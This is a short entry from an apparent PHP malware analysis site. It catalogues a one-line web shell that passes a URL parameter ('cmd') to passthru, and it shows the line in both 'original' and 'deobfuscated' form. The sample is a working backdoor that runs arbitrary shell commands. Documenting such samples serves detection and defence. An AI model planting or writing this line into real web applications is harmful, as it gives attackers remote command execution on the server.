Toggle navigation
Beneri
Hash Game
Real Sec
Malware Analysis
About
PHP Malware Analysis
Back to list
Tags
Execution
passthru
Input
_GET
Deobfuscated code
<?php passthru($_GET['cmd']);
Original code
<?php passthru($_GET['cmd']); ?>